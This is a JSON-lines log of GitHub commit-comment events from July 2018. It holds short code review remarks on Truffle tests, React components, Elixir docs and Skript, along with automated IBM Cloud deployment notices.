{"id":"7957378506","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29687739,"position":51,"line":19,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-12T16:33:02Z","updated_at":"2018-07-12T16:33:02Z","author_association":"NONE","body":"You lost the fact that `contract(\"Splitter\", accounts => {`. That's right, `accounts` are given to you.\r\n"}},"created_at":"2018-07-12T16:33:02Z"}
{"id":"7957380385","type":"CommitCommentEvent","actor":{"login":"Dorbedo"},"repo":{"name":"michail-nikolaev/task-force-arma-3-radio"},"payload":{"comment":{"id":29687740,"position":null,"line":null,"path":null,"commit_id":"25f3f278c19512bd9a0fc609ec5d91b2dd6dc908","created_at":"2018-07-12T16:33:25Z","updated_at":"2018-07-12T16:33:25Z","author_association":"CONTRIBUTOR","body":"We have already discussed it in the discord some days ago.\r\nIt is delayed until Version 1.1. Or if you like, PR are appreciated ;-)"}},"created_at":"2018-07-12T16:33:25Z"}
{"id":"7957381624","type":"CommitCommentEvent","actor":{"login":"genshinarita"},"repo":{"name":"cd-adapco/i18n"},"payload":{"comment":{"id":29687746,"position":null,"line":null,"path":null,"commit_id":"0244d3072933fd60ea7260966a3d38463c934875","created_at":"2018-07-12T16:33:39Z","updated_at":"2018-07-12T16:33:39Z","author_association":"CONTRIBUTOR","body":"Automatically uploaded by WorldServer on behalf of Joern Elligsen on Jul 12, 2018 at 12:33:35 EDT."}},"created_at":"2018-07-12T16:33:39Z"}
{"id":"7957382909","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29687747,"position":51,"line":19,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-12T16:33:55Z","updated_at":"2018-07-12T16:33:55Z","author_association":"NONE","body":"Also, in this case I tend to do:\r\n\r\n```javascript\r\ncontract(\"Splitter\", function(accounts) {\r\n```\r\nBecause the `() => {}` syntax does not allow you to use `this` within the body of the function."}},"created_at":"2018-07-12T16:33:55Z"}
{"id":"7957382941","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687748,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T16:33:55Z","updated_at":"2018-07-12T16:33:55Z","author_association":"MEMBER","body":"> The main difference is the distinction between atoms (orange), sigils (also orange, but I'm thinking of making them brown) and strings (green)\r\n\r\nRight, I personally find that it makes it have too much going on in there. "}},"created_at":"2018-07-12T16:33:55Z"}
{"id":"7957383731","type":"CommitCommentEvent","actor":{"login":"genshinarita"},"repo":{"name":"cd-adapco/i18n"},"payload":{"comment":{"id":29687750,"position":null,"line":null,"path":null,"commit_id":"aff6c8bff48ac9fc2c602c38ba5ba0ef6a37339c","created_at":"2018-07-12T16:34:04Z","updated_at":"2018-07-12T16:34:04Z","author_association":"CONTRIBUTOR","body":"Automatically uploaded by WorldServer on behalf of Joern Elligsen on Jul 12, 2018 at 12:34:01 EDT."}},"created_at":"2018-07-12T16:34:04Z"}
{"id":"7957383834","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"DataStrategist/amitkohli.com"},"payload":{"comment":{"id":29687751,"position":31,"line":38,"path":"content/post/2018-07-07-crime-statistics-in-london.Rmd","commit_id":"7880641904bcc2d20c61dfcd0195a9edd768c4fe","created_at":"2018-07-12T16:34:06Z","updated_at":"2018-07-12T16:34:06Z","author_association":"NONE","body":"You may want `out.width='100%'` when your code chunks contain HTML widgets."}},"created_at":"2018-07-12T16:34:06Z"}
{"id":"7957384205","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29687752,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T16:34:10Z","updated_at":"2018-07-12T16:34:10Z","author_association":"MEMBER","body":"Documentation change should be enough."}},"created_at":"2018-07-12T16:34:10Z"}
{"id":"7957385660","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29687755,"position":null,"line":null,"path":null,"commit_id":"3b6950b65afa65d2b4d20590ac51fff24d1605a8","created_at":"2018-07-12T16:34:27Z","updated_at":"2018-07-12T16:34:27Z","author_association":"OWNER","body":"I could build the RCS in but the old Centaur doesn't have built in RCS so it felt weird to require them for one and not the other? My thought was it might be better to improve those rather than forget about them."}},"created_at":"2018-07-12T16:34:27Z"}
{"id":"7957385747","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29687756,"position":66,"line":26,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-12T16:34:27Z","updated_at":"2018-07-12T16:34:27Z","author_association":"NONE","body":"See, no need to make an ugly synchronous round trip when you have `accounts` already line 19."}},"created_at":"2018-07-12T16:34:27Z"}
{"id":"7957386545","type":"CommitCommentEvent","actor":{"login":"juansanzone"},"repo":{"name":"mercadopago/px-ios"},"payload":{"comment":{"id":29687757,"position":13,"line":30,"path":"MercadoPagoSDK/MercadoPagoSDK/Animated Button/PXAnimatedButton.swift","commit_id":"523ba6f2bc0a23c6f7a0f194f59ae26f7a8fc6f0","created_at":"2018-07-12T16:34:37Z","updated_at":"2018-07-12T16:34:37Z","author_association":"COLLABORATOR","body":"💃  🥇 @edentorres "}},"created_at":"2018-07-12T16:34:37Z"}
{"id":"7957388827","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29687764,"position":null,"line":null,"path":null,"commit_id":"d62d5ffa0b57892dbc2dfb60fb52c44929d39382","created_at":"2018-07-12T16:35:05Z","updated_at":"2018-07-12T16:35:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180712-163504 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180712-163504\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-12T16:35:05Z"}
{"id":"7957390549","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29687768,"position":71,"line":31,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-12T16:35:26Z","updated_at":"2018-07-12T16:35:26Z","author_association":"NONE","body":"Do not leave it to chance:\r\n\r\n```javascript\r\nSplitter.new(benefactor, firstRecipient, secondRecipient, { from: accounts[0] })\r\n```\r\nDon't forget that you have a pretty tough requirement in your constructor: `require(_benefactor != getOwner());`\r\nSo yeah, don't leave it to chance."}},"created_at":"2018-07-12T16:35:26Z"}
{"id":"7957395132","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29687782,"position":null,"line":null,"path":null,"commit_id":"e76bba708cba5670ff6534a7cec22d6a1b6451b0","created_at":"2018-07-12T16:36:17Z","updated_at":"2018-07-12T16:36:17Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-163615 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-163615\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:36:17Z"}
{"id":"7957395707","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687783,"position":null,"line":null,"path":null,"commit_id":"36e46d43f4f544301e71788b00ba6e3ad89d41ac","created_at":"2018-07-12T16:36:24Z","updated_at":"2018-07-12T16:36:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-163623 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-163623\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:36:24Z"}
{"id":"7957396236","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dialogflow-v2-client"},"payload":{"comment":{"id":29687786,"position":null,"line":null,"path":null,"commit_id":"ca7cfcb89223cb4d0ab03be2eba55227f0083eeb","created_at":"2018-07-12T16:36:30Z","updated_at":"2018-07-12T16:36:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/9db350e1-1bdd-46ce-b6bc-f1a1fe7aae7f?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7c2d4740-e52d-4d28-af66-f8589eede134?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\") deployed [dialogflow-v2-client](https://github.com/godo13405/dialogflow-v2-client/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180712-163628 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180712-163628\") to [prod](https://console.bluemix.net/apps/7c20ca82-deb0-46f6-91cb-ccd808781f77?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-12T16:36:30Z"}
{"id":"7957397135","type":"CommitCommentEvent","actor":{"login":"lrinQVQ"},"repo":{"name":"lrinQVQ/Xiaomi_Kernel_OpenSource"},"payload":{"comment":{"id":29687790,"position":null,"line":null,"path":null,"commit_id":"43bf70b25c789e2f35c4c40fc626856138c02f56","created_at":"2018-07-12T16:36:41Z","updated_at":"2018-07-12T16:36:41Z","author_association":"OWNER","body":"嘛你可以学下c的include\r\n你要简单点说就是\r\n<>是在Makefile中定义的include下寻找文件\r\n\"\"是当前文件夹"}},"created_at":"2018-07-12T16:36:41Z"}
{"id":"7957398339","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29687794,"position":73,"line":33,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-12T16:36:55Z","updated_at":"2018-07-12T16:36:55Z","author_association":"NONE","body":"No.\r\n`splitter.benefactor()` is a promise. So the right way to do is:\r\n\r\n```javascript\r\n.then(splitter -> {\r\n    return splitter.benefactor();\r\n})\r\n.then(benef => assert.strictEqual(benef, benefactor))\r\n```\r\nOf course, you want to test all 3, I let you find the best way to do it."}},"created_at":"2018-07-12T16:36:55Z"}
{"id":"7957398531","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29687795,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T16:36:58Z","updated_at":"2018-07-12T16:36:58Z","author_association":"CONTRIBUTOR","body":"Hmmm.. I know stuff like that is supposed to be simple in Skript, but on the java/practical side, `setAllowFlight` and `setFlying` are two completely different things and should be split into two separate effects **imo**"}},"created_at":"2018-07-12T16:36:58Z"}
{"id":"7957404523","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29687818,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T16:38:06Z","updated_at":"2018-07-12T16:38:06Z","author_association":"MEMBER","body":"Forcing something to fly should be always possible. It is unfortunate that Minecraft separate forced flight from normal, creative flight."}},"created_at":"2018-07-12T16:38:06Z"}
{"id":"7957406471","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29687822,"position":null,"line":null,"path":null,"commit_id":"34740281ebf715d153ca1f5de7fb4963979c8b38","created_at":"2018-07-12T16:38:28Z","updated_at":"2018-07-12T16:38:28Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-163826 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-163826\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:38:28Z"}
{"id":"7957406525","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29687824,"position":22,"line":31,"path":"src/components/Dashboard.js","commit_id":"f549dcaadd6ee8ef8b9d4dc2a6aa20fd60d35d9c","created_at":"2018-07-12T16:38:28Z","updated_at":"2018-07-12T16:38:28Z","author_association":"COLLABORATOR","body":"This componentWillReceiveProps is unnecessary.  You can pass props explicitly from the connected dashboard component to the child UsersList.  Please read [this](https://reactjs.org/docs/state-and-lifecycle.html) for more details.  We don't need local component state here. "}},"created_at":"2018-07-12T16:38:28Z"}
{"id":"7957407296","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"davidanthoff/TableShowUtils.jl"},"payload":{"comment":{"id":29687826,"position":1,"line":1,"path":"appveyor.yml","commit_id":"ca9639b91e851c0d68465c58873a2044dc4aabf5","created_at":"2018-07-12T16:38:37Z","updated_at":"2018-07-12T16:38:37Z","author_association":"NONE","body":"Note that https://github.com/JuliaCI/Appveyor.jl/blob/master/appveyor.yml now exists as a new appveyor.yml template, which should simplify appveyor scripts for julia packages."}},"created_at":"2018-07-12T16:38:37Z"}
{"id":"7957408637","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29687831,"position":33,"line":41,"path":"src/components/Dashboard.js","commit_id":"f549dcaadd6ee8ef8b9d4dc2a6aa20fd60d35d9c","created_at":"2018-07-12T16:38:52Z","updated_at":"2018-07-12T16:38:52Z","author_association":"COLLABORATOR","body":"Again, use props explicitly."}},"created_at":"2018-07-12T16:38:52Z"}
{"id":"7957415481","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29687843,"position":10,"line":10,"path":"src/components/UsersList.js","commit_id":"f549dcaadd6ee8ef8b9d4dc2a6aa20fd60d35d9c","created_at":"2018-07-12T16:40:14Z","updated_at":"2018-07-12T16:40:14Z","author_association":"COLLABORATOR","body":"I think you have some confusion about the difference between props and state.  Please re-read all the React docs around these ideas and try to do some searches online about props vs state. "}},"created_at":"2018-07-12T16:40:14Z"}
{"id":"7957417085","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29687848,"position":4,"line":4,"path":"src/components/UsersList.js","commit_id":"f549dcaadd6ee8ef8b9d4dc2a6aa20fd60d35d9c","created_at":"2018-07-12T16:40:31Z","updated_at":"2018-07-12T16:40:31Z","author_association":"COLLABORATOR","body":"This should be a purely functional component."}},"created_at":"2018-07-12T16:40:31Z"}
{"id":"7957418134","type":"CommitCommentEvent","actor":{"login":"sagark93"},"repo":{"name":"sagark93/Python_initial"},"payload":{"comment":{"id":29687851,"position":null,"line":null,"path":null,"commit_id":"424e1603b3807d704856bf5fb0e04bafd1dc6805","created_at":"2018-07-12T16:40:43Z","updated_at":"2018-07-12T16:40:43Z","author_association":"OWNER","body":"start"}},"created_at":"2018-07-12T16:40:43Z"}
{"id":"7957423178","type":"CommitCommentEvent","actor":{"login":"danwdart"},"repo":{"name":"dadi/publish"},"payload":{"comment":{"id":29687860,"position":null,"line":null,"path":null,"commit_id":"8bdf617de5aa4fa590513faca5b8272d375d2209","created_at":"2018-07-12T16:41:47Z","updated_at":"2018-07-12T16:41:47Z","author_association":"CONTRIBUTOR","body":"Anton showed me this bit, and I split it up so that the validation wouldn't complain at me"}},"created_at":"2018-07-12T16:41:47Z"}
{"id":"7957424638","type":"CommitCommentEvent","actor":{"login":"hotio"},"repo":{"name":"Admin9705/PlexGuide.com-The-Awesome-Plex-Server"},"payload":{"comment":{"id":29687861,"position":null,"line":null,"path":null,"commit_id":"b1f931bbf2cc12d989a795ed798193e26a517e01","created_at":"2018-07-12T16:42:04Z","updated_at":"2018-07-12T16:42:04Z","author_association":"CONTRIBUTOR","body":"Please remove suitarr, I do not wish to be associated with such a vile project."}},"created_at":"2018-07-12T16:42:04Z"}
{"id":"7957428107","type":"CommitCommentEvent","actor":{"login":"ursulaSW"},"repo":{"name":"ursulaSW/hello-world"},"payload":{"comment":{"id":29687866,"position":null,"line":null,"path":null,"commit_id":"f9f4f06d0ef5eed94d2e23bb5ab4b6153770fbcd","created_at":"2018-07-12T16:42:45Z","updated_at":"2018-07-12T16:42:45Z","author_association":"OWNER","body":"this is nonsense"}},"created_at":"2018-07-12T16:42:45Z"}
{"id":"7957430099","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687875,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T16:43:11Z","updated_at":"2018-07-12T16:43:11Z","author_association":"CONTRIBUTOR","body":"Ok, so I'll leave atoms, chatlists, strings and sigils with the same color. But can I at least:\r\n\r\n1. Color the funcion name in `def f(...)` in a different color?\r\n\r\n2. Highlight escape chars (e.g. `\"\\'\"`)?\r\n\r\n3. Highlight string interpolation markers (e.g. `#{something}`)?\r\n\r\n4. Highlight regexes in a different color from nirmal sigils?"}},"created_at":"2018-07-12T16:43:11Z"}
{"id":"7957431594","type":"CommitCommentEvent","actor":{"login":"owenssaull"},"repo":{"name":"ASaull/there-be-dragons"},"payload":{"comment":{"id":29687879,"position":null,"line":null,"path":null,"commit_id":"6fab576dcf7afc53ad69e1ebbc4642ead8aa8626","created_at":"2018-07-12T16:43:29Z","updated_at":"2018-07-12T16:43:29Z","author_association":"COLLABORATOR","body":"nicely done\r\n"}},"created_at":"2018-07-12T16:43:29Z"}
{"id":"7957432756","type":"CommitCommentEvent","actor":{"login":"mmamaym"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29687882,"position":null,"line":null,"path":null,"commit_id":"51e935b8a653c72e22acc9c34282fe88da79dbf3","created_at":"2018-07-12T16:43:41Z","updated_at":"2018-07-12T16:43:41Z","author_association":"NONE","body":"thank you\r\n\r\n> "}},"created_at":"2018-07-12T16:43:41Z"}
{"id":"7957434514","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687886,"position":null,"line":null,"path":null,"commit_id":"7edb0563e968b09f1bc19abd5b97b8c8be9e9fbf","created_at":"2018-07-12T16:44:01Z","updated_at":"2018-07-12T16:44:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-164400 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-164400\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:44:01Z"}
{"id":"7957435115","type":"CommitCommentEvent","actor":{"login":"clairechoo"},"repo":{"name":"artsil2010/first_project"},"payload":{"comment":{"id":29687889,"position":null,"line":null,"path":null,"commit_id":"6172d2e4f334695b8c8ab64f3d0e3fa2f244f11b","created_at":"2018-07-12T16:44:09Z","updated_at":"2018-07-12T16:44:09Z","author_association":"NONE","body":"Hello there"}},"created_at":"2018-07-12T16:44:09Z"}
{"id":"7957437936","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29687896,"position":32,"line":40,"path":"src/components/Dashboard.js","commit_id":"f549dcaadd6ee8ef8b9d4dc2a6aa20fd60d35d9c","created_at":"2018-07-12T16:44:41Z","updated_at":"2018-07-12T16:44:41Z","author_association":"COLLABORATOR","body":"Don't call `getUsers` directly here on render.  Create a button in the `UsersList` component, pass `getUsers` explicitly as a prop and use it in the button's onClick handler."}},"created_at":"2018-07-12T16:44:41Z"}
{"id":"7957442478","type":"CommitCommentEvent","actor":{"login":"lgabs"},"repo":{"name":"lgabs/udacity-bikeshare"},"payload":{"comment":{"id":29687909,"position":null,"line":null,"path":null,"commit_id":"b62bf843f314c64a8afdbd88676479580892f71d","created_at":"2018-07-12T16:45:33Z","updated_at":"2018-07-12T16:45:33Z","author_association":"OWNER","body":"Resta colocar o type das listas de dicionários que servem argumentos em algumas funções."}},"created_at":"2018-07-12T16:45:33Z"}
{"id":"7957444882","type":"CommitCommentEvent","actor":{"login":"Negromovich"},"repo":{"name":"EasyCorp/EasyAdminBundle"},"payload":{"comment":{"id":29687913,"position":null,"line":null,"path":null,"commit_id":"7b3d03fb6437dfe6bd7929a319d85965464d13d3","created_at":"2018-07-12T16:46:00Z","updated_at":"2018-07-12T16:46:00Z","author_association":"NONE","body":"This change broke the loading of templates from custom bundles. `$this->twigLoader->getPaths()` return only \"__main__\" namespace by default. As a result check only `vendor/symfony/symfony/src/Symfony/Bridge/Twig/Resources/views/Form` directory by default."}},"created_at":"2018-07-12T16:46:00Z"}
{"id":"7957449249","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29687926,"position":17,"line":460,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T16:46:51Z","updated_at":"2018-07-12T16:46:51Z","author_association":"CONTRIBUTOR","body":"this also needs some rework."}},"created_at":"2018-07-12T16:46:51Z"}
{"id":"7957449843","type":"CommitCommentEvent","actor":{"login":"akuala"},"repo":{"name":"akuala/setubal"},"payload":{"comment":{"id":29687928,"position":null,"line":null,"path":null,"commit_id":"c31fb0271391f4dadcda058290f52846a8d5cd78","created_at":"2018-07-12T16:46:58Z","updated_at":"2018-07-12T16:46:58Z","author_association":"OWNER","body":"ola"}},"created_at":"2018-07-12T16:46:58Z"}
{"id":"7957450201","type":"CommitCommentEvent","actor":{"login":"allisonkarlitskaya"},"repo":{"name":"cockpit-project/cockpit"},"payload":{"comment":{"id":29687929,"position":18,"line":204,"path":"src/common/cockpitchannel.c","commit_id":"0efd56f3ac20604a0605d32eb8648b6e55d85dfb","created_at":"2018-07-12T16:47:02Z","updated_at":"2018-07-12T16:47:02Z","author_association":"CONTRIBUTOR","body":"I just imagine a situation where someone is using ping for diagnostic purposes (ie: not flow control) and can therefore bring down an entire channel by accident.\r\n\r\nCan we check that this is ping for flow control capability signalling reasons?  eg: there exists a sequence field and it's set to 0."}},"created_at":"2018-07-12T16:47:02Z"}
{"id":"7957451820","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687933,"position":null,"line":null,"path":null,"commit_id":"4ad58f0be77d3c3967f53d78f81251f51543d1c7","created_at":"2018-07-12T16:47:19Z","updated_at":"2018-07-12T16:47:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-164719 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-164719\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:47:19Z"}
{"id":"7957457090","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29687942,"position":44,"line":65,"path":"src/components/Dashboard.js","commit_id":"f549dcaadd6ee8ef8b9d4dc2a6aa20fd60d35d9c","created_at":"2018-07-12T16:48:22Z","updated_at":"2018-07-12T16:48:22Z","author_association":"COLLABORATOR","body":"Users should be an array of objects.  Please read [immutable patterns](https://redux.js.org/recipes/structuring-reducers/immutable-update-patterns) for more details on how to handle this in your reducer."}},"created_at":"2018-07-12T16:48:22Z"}
{"id":"7957459433","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"crok/crokrammgmtfix"},"payload":{"comment":{"id":29687946,"position":5,"line":5,"path":"common/tweak","commit_id":"c46501861cb3e9633f993cdf45a39d763fe5e941","created_at":"2018-07-12T16:48:51Z","updated_at":"2018-07-12T16:48:51Z","author_association":"NONE","body":"Stopping perfd isn't necessarily a good idea, since it handles a lot of the devices native boosting and could mess with iop if your devices has it. Better idea is to modify the devices perf profiles (ex: https://github.com/ThankYouMario/proprietary_vendor_oneplus/tree/nougat-mr2/oneplus3/proprietary/vendor/etc)"}},"created_at":"2018-07-12T16:48:51Z"}
{"id":"7957461665","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29687948,"position":24,"line":465,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T16:49:19Z","updated_at":"2018-07-12T16:49:19Z","author_association":"CONTRIBUTOR","body":"_\"Synchronizing file...\"_ instead of _\"Uploading file…\"_?"}},"created_at":"2018-07-12T16:49:19Z"}
{"id":"7957465350","type":"CommitCommentEvent","actor":{"login":"cacheclear"},"repo":{"name":"cacheclear/laracasts"},"payload":{"comment":{"id":29687955,"position":null,"line":null,"path":null,"commit_id":"438e13f32bd2d237ecb4342adccab05a9f01e01d","created_at":"2018-07-12T16:50:03Z","updated_at":"2018-07-12T16:50:03Z","author_association":"OWNER","body":"For Facades like App, Request and View there are helperfunctions which can be used instead: app(), request() and view().\r\n\r\nApp::make() can be replaced by the helperfunction app() or by its alias resolve(). They are used to get instances out of the service container.\r\n\r\n"}},"created_at":"2018-07-12T16:50:03Z"}
